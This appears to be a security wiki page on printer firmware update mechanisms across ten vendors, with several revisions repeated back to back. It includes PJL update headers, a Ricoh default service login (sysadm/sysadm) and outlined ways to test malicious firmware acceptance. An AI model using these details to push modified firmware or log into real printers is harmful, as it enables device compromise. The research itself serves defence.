<code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure. == Results == Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below: {| class="wikitable" |- ! Vendor !! Extension !! Quantity !! File header or type |- | rowspan="2" | HP | rfu || 419 || @PJL UPGRADE SIZE=… |- | bdl || 206 || FutureSmart binary format |- | rowspan="3" | Epson | rcx || 49 || SEIKO EPSON EpsonNet Form |- | prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | rowspan="6" | Dell | fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | ps || 2 || PostScript (title: ''Firmware Update'') |- | pjl || 1 || @PJL ENTER LANGUAGE=FLASH |- | rowspan="2" | Brother | djf || 79 || @PJL EXECUTE BRDOWNLOAD |- | blf || 9 || @PJL ENTER LANGUAGE=PCL |- | rowspan="2" | Lexmark | fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | bin, fls || 6 || Unknown binary format |- | rowspan="2" | Samsung | hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | rowspan="10" | Xerox | ps || 36 || PostScript (title: ''Firmware Update'') |- | dlm || 35 || Xerox Dynamic Loadable Module |- | prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | bin || 10 || @PJL SET JOBATTR="@SWDL" |- | fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH |- | pjl || 3 || @PJL FSDOWNLOAD [name].rpm |- | axf || 3 || RISC OS AIF executable |- | rowspan="3" | Ricoh | brn || 15 || @PJL FWDOWNLOAD… |- | bin || 14 || @PJL RSYSTEMUPDATE SIZE=… |- | fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | rowspan="4" | Kyocera | cramfs, img || 98 || cramfs image |- | bin, squashfs || 79 || squashfs image |- | bin, kmmfp || 41 || u-boot legacy uImage |- | efi, kmpanel || 13 || proprietary image format |- | rowspan="4" | Konica Minolta | bin || 38 || unknown binary, additional checksum file |- | ps || 20 || PostScript (title: ''Softload printer modules'') |- | ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE |- | upg || 1 || @PJL ENTER LANGUAGE=UPGRADE |- |} '''How to test for this attack?''' The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project. ''Other attack scenarios include:'' * Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses. * Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable). * Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- b8f5e3401c9823b1c8e476ee4e444688fb033cb9 267 195 2017-01-28T15:24:40Z Admin 1 wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. === Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number which to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms. === Dell === Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters, one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code> while nine <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. === Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure. == Results == Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below: {| class="wikitable" |- ! Vendor !! Extension !! Quantity !! File header or type |- | rowspan="2" | HP | rfu || 419 || @PJL UPGRADE SIZE=… |- | bdl || 206 || FutureSmart binary format |- | rowspan="3" | Epson | rcx || 49 || SEIKO EPSON EpsonNet Form |- | prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | rowspan="6" | Dell | fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | ps || 2 || PostScript (title: ''Firmware Update'') |- | pjl || 1 || @PJL ENTER LANGUAGE=FLASH |- | rowspan="2" | Brother | djf || 79 || @PJL EXECUTE BRDOWNLOAD |- | blf || 9 || @PJL ENTER LANGUAGE=PCL |- | rowspan="2" | Lexmark | fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | bin, fls || 6 || Unknown binary format |- | rowspan="2" | Samsung | hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | rowspan="10" | Xerox | ps || 36 || PostScript (title: ''Firmware Update'') |- | dlm || 35 || Xerox Dynamic Loadable Module |- | prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | bin || 10 || @PJL SET JOBATTR="@SWDL" |- | fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH |- | pjl || 3 || @PJL FSDOWNLOAD [name].rpm |- | axf || 3 || RISC OS AIF executable |- | rowspan="3" | Ricoh | brn || 15 || @PJL FWDOWNLOAD… |- | bin || 14 || @PJL RSYSTEMUPDATE SIZE=… |- | fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | rowspan="4" | Kyocera | cramfs, img || 98 || cramfs image |- | bin, squashfs || 79 || squashfs image |- | bin, kmmfp || 41 || u-boot legacy uImage |- | efi, kmpanel || 13 || proprietary image format |- | rowspan="4" | Konica Minolta | bin || 38 || unknown binary, additional checksum file |- | ps || 20 || PostScript (title: ''Softload printer modules'') |- | ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE |- | upg || 1 || @PJL ENTER LANGUAGE=UPGRADE |- |} '''How to test for this attack?''' The security of code signing is based on keeping the private key a long-term trade secret. There are however potentially still printers in the wild which are vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project. ''Other attack scenarios include:'' * Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses. * Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable). * Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 32371ae6822b8a24f157bcc94a7b56a959ca7ae5 195 193 2017-01-23T12:10:04Z Admin 1 wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. === Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number which to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms. === Dell === Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters, one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code> while nine <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. === Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure. == Results == Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however, is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below: {| class="wikitable" |- ! Vendor !! Extension !! Quantity !! File header or type |- | rowspan="2" | HP | rfu || 419 || @PJL UPGRADE SIZE=… |- | bdl || 206 || FutureSmart binary format |- | rowspan="3" | Epson | rcx || 49 || SEIKO EPSON EpsonNet Form |- | prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | rowspan="6" | Dell | fls, fly || 30 || <span style="background:#87CEEB">@PJL 